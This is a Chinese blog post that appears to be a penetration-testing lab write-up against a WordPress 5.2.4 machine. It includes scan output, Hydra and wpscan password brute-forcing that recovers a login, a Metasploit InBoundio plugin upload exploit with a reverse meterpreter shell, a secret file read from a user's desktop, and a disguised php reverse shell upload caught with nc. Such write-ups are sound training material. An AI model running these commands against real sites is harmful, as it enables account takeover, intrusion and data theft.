Worspress 入侵

套路1

┌──(root㉿kali)-[~/PT_day2]
└─# nmap 172.16.20.3 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 03:09 EST
Nmap scan report for 172.16.20.3
Host is up (0.044s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 27.03 seconds

套路2

┌──(root㉿kali)-[~/PT_day2]
└─# nmap 172.16.20.3 -p80 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 03:10 EST
Nmap scan report for 172.16.20.3
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.2.4
|_http-title: My Blogs – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.0 (94%), Linux 4.4 (94%), Linux 3.10 - 3.12 (93%), Linux 3.10 - 3.16 (92%), Linux 3.10 (91%), Linux 4.9 (91%), Linux 2.6.18 (90%), Linux 3.10 - 4.11 (89%), Linux 3.11 - 4.1 (89%), Linux 3.2 - 4.9 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   66.02 ms 192.168.200.1
2   14.94 ms 172.16.20.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds

發現只有一個80 port,探測目錄:

┌──(root㉿kali)-[~/PT_day2]
└─# nikto -host http://172.16.20.3
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.20.3
+ Target Hostname:    172.16.20.3
+ Target Port:        80
+ Start Time:         2023-02-26 03:15:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://172.16.20.3/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7925 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2023-02-26 03:18:07 (GMT-5) (179 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n

到其中一個目錄看一下:

連上網頁看一下:

接下來想用hydra來爆破密碼。打開burp suite,設定proxy。隨便輸入錯誤的:

接下來看看burp:

底下的request內容如下,可以知道第一篇提到的綠框、橘框該填什麼:

POST /wp-login.php HTTP/1.1
Host: 172.16.20.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.20.3/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://172.16.20.3
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

log=john&pwd=aaa&wp-submit=Log+In&redirect_to=http%3A%2F%2F172.16.20.3%2Fwp-admin%2F&testcookie=1

觀察一下:

hydra http post form example

How to Brute Force Websites & Online Forms Using Hydra | Infinite Logins

aaa接下來看看藍圈要填什麼:

要注意錯誤訊息複製沒有html標籤的就好。

hydra -l john -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt 172.16.20.3 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F172.16.20.3%2Fwp-admin%2F&testcookie=1:The password you entered for the username"

如果像上面這樣下指令,會找出四個ok的密碼,其實是有問題,代表指令打錯。

解決方法1: 後面加參數-t 4,但沒用。

解決方法2: 錯誤訊息不要用The password you entered for the username,但也沒用。

只好換另一個針對wordpress的工具--wpscan。

┌──(root㉿kali)-[~/PT_day2]
└─# wpscan --url http://172.16.20.3 -U "john" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://172.16.20.3/ [172.16.20.3]
[+] Started: Sun Feb 26 06:28:41 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.16.20.3/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.16.20.3/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.16.20.3/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.16.20.3/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
 | Found By: Rss Generator (Passive Detection)
 |  - http://172.16.20.3/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
 |  - http://172.16.20.3/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://172.16.20.3/wp-content/themes/twentynineteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://172.16.20.3/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] inboundio-marketing
 | Location: http://172.16.20.3/wp-content/plugins/inboundio-marketing/
 | Latest Version: 2.0.1 (up to date)
 | Last Updated: 2015-07-23T07:01:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.16.20.3/wp-content/plugins/inboundio-marketing/README.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://172.16.20.3/wp-content/plugins/inboundio-marketing/README.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - john / iloveyou
Trying john / robert Time: 00:00:01 <     > (55 / 1000055)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: john, Password: iloveyou

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb 26 06:28:50 2023
[+] Requests Done: 246
[+] Cached Requests: 5
[+] Data Sent: 74.246 KB
[+] Data Received: 20.031 MB
[+] Memory used: 267.863 MB
[+] Elapsed time: 00:00:09

得知密碼iloveyou。枚舉使用者帳號:

┌──(root㉿kali)-[~/PT_day2]
└─# wpscan --url http://172.16.20.3 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://172.16.20.3/ [172.16.20.3]
[+] Started: Sun Feb 26 06:34:31 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.16.20.3/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.16.20.3/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.16.20.3/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.16.20.3/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
 | Found By: Rss Generator (Passive Detection)
 |  - http://172.16.20.3/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
 |  - http://172.16.20.3/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://172.16.20.3/wp-content/themes/twentynineteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://172.16.20.3/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] jason
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://172.16.20.3/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] alvin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] james
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb 26 06:34:34 2023
[+] Requests Done: 31
[+] Cached Requests: 36
[+] Data Sent: 8.299 KB
[+] Data Received: 86.785 KB
[+] Memory used: 174.059 MB
[+] Elapsed time: 00:00:03

第一小題解決。

第二小題,先利用第一小題得到的密碼登入:

檢查外掛有沒有poc可用:

┌──(kali㉿kali)-[~]
└─$ msfconsole

                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.3.2-dev                           ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter
session on many platforms using sessions -u
<session_id>
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search inboundio

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank       Check  Description
   -  ----                                                    ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_inboundio_marketing_file_upload  2015-03-24       excellent  Yes    Wordpress InBoundio Marketing PHP Upload Vulnerability


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_inboundio_marketing_file_upload

看來第二個外掛是有:

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > show options

Module options (exploit/unix/webapp/wp_inboundio_marketing_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:por
                                         t[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.
                                         metasploit.com/docs/using-metasploit/
                                         basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connec
                                         tions
   TARGETURI  /                yes       The base path to the wordpress applic
                                         ation
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.18.192   yes       The listen address (an interface may be s
                                     pecified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   InBoundio Marketing 2.0



View the full module info with the info, or info -d command.

進行攻擊設定:

msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > set rhosts 172.16.20.3
rhosts => 172.16.20.3
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > set lhost 192.168.200.3
lhost => 192.168.200.3
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > set lport 16203
lport => 16203
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > run

[*] Started reverse TCP handler on 192.168.200.3:16203
[+] Our payload is at: vbkTtLKBbXER.php.
[*] Calling payload...
[*] Sending stage (39927 bytes) to 172.16.20.3
[+] Deleted vbkTtLKBbXER.php
[*] Meterpreter session 1 opened (192.168.200.3:16203 -> 172.16.20.3:37394) at 2023-02-26 06:52:38 -0500

meterpreter > shell
Process 8386 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

會改lport只是因為剛剛前一題用過了,而現在成功入侵,但shell很難用,所以穩定shell:

python -c 'import pty;pty.spawn("/bin/bash")'
<s/inboundio-marketing/admin/partials/uploaded_csv$ cd /
cd /
www-data@localhost:/$ ls
ls
bin   etc         initrd.img.old  lost+found  opt   run   sys  var
boot  home        lib             media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old
www-data@localhost:/$ find / -type f -name sevret.txt -print 2>dev/null
find / -type f -name sevret.txt -print 2>dev/null
www-data@localhost:/$ find / -type f -name secret.txt -print 2>dev/null
find / -type f -name secret.txt -print 2>dev/null
/home/jason/Desktop/secret.txt
www-data@localhost:/$ cat /home/jason/Desktop/secret.txt
cat /home/jason/Desktop/secret.txt
$ECur!ty

後面的-print 2>dev/null是為了避免出現一堆permission denied,意思是把錯誤資訊丟給dev的null。

如果不用metaspolit,還有另一個方式,就是上傳reverse shell:

kali的reverse shell放在上圖路徑,現在把它複製到別的地方:

編輯這個php:

┌──(root㉿kali)-[~]
└─# cd /home/kali/Downloads

┌──(root㉿kali)-[/home/kali/Downloads]
└─# vim php-reverse-shell.php

改紅底線處,改成攻擊機的IP跟port:

把它改個附檔名,希望它不會被wordpress擋下來。

┌──(root㉿kali)-[/home/kali/Downloads]
└─# mv php-reverse-shell.php abbot.php

┌──(root㉿kali)-[/home/kali/Downloads]
└─# mv abbot.php abbot.php.jpg

到上傳介面:

這時開啟burp跟攔截,因為到時候會需要查看是否會被wordpress檔下,並找上傳後檔案的網址。

上傳:

因為開啟了intercept,所以上傳後會卡在100%,不會done

查看目前intecept內的內容:

.jpg給刪掉,一直按左上的Forward直到沒東西,代表真的把這php上傳完畢,這時再切換到HTTP history。

可以發現edited有打勾的:

6號跟8號之間的7號是wordpress檢查上傳檔案的網頁。

可以發現php已成功上傳,連結如上圖紅底,所以先在攻擊機監聽:

┌──(root㉿kali)-[~/PT_day2]
└─# nc -lvnp 8081
listening on [any] 8081 ...

注意proxy的設定要復原。

點選abbot.php,會發現攻擊機變成以下畫面,代表控制成功:

┌──(root㉿kali)-[~/PT_day2]
└─# nc -lvnp 8081
listening on [any] 8081 ...
connect to [192.168.200.3] from (UNKNOWN) [172.16.20.3] 58836
Linux localhost.localdomain 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2 (2019-08-28) x86_64 GNU/Linux
 12:07:17 up 1 day,  3:24,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jason    :1       :1               14Mar22 ?xdm?   1:38   0.01s /usr/lib/gdm3/gdm-x-session --run-script /usr/bin/gnome-session
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

也可以不用點網頁上的php,直接用wget下載剛剛的url也可以造成觸發。


#wpscan之wordpress密碼爆破 #InBoundio Marketing弱點 #wordpress上傳reverse shell







Related Posts

JavaScript 中的同步與非同步(上):先成為 callback 大師吧!

JavaScript 中的同步與非同步(上):先成為 callback 大師吧!

原始型別(傳值By Value ) v.s 物件型別(傳參考By Reference)

原始型別(傳值By Value ) v.s 物件型別(傳參考By Reference)

Hello World

Hello World


Comments